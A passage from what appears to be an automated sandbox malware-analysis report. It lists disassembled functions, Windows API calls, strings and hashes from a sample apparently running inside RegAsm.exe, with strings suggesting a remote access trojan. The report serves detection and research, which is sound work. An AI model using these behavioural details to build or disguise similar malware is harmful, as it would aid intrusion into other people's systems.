                                                                                                                                                                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                                                                                  Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                                                                                                  • Rmc-EPF38I, xrefs: 00407715
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-EPF38I
                                                                                                                                                                                                  • API String ID: 0-2160439477
                                                                                                                                                                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                                                                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                                                                                                                  • API String ID: 2993684571-305739064
                                                                                                                                                                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                                                                  Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                  • String ID: Alarm triggered
                                                                                                                                                                                                  • API String ID: 614609389-2816303416
                                                                                                                                                                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                                                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                                                                                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                                                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                                                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2180151492-0
                                                                                                                                                                                                  • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                                                                  Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                  • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                                                                  Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                                                  Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 493641738-0
                                                                                                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                  Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                                                                  Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 00444106
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
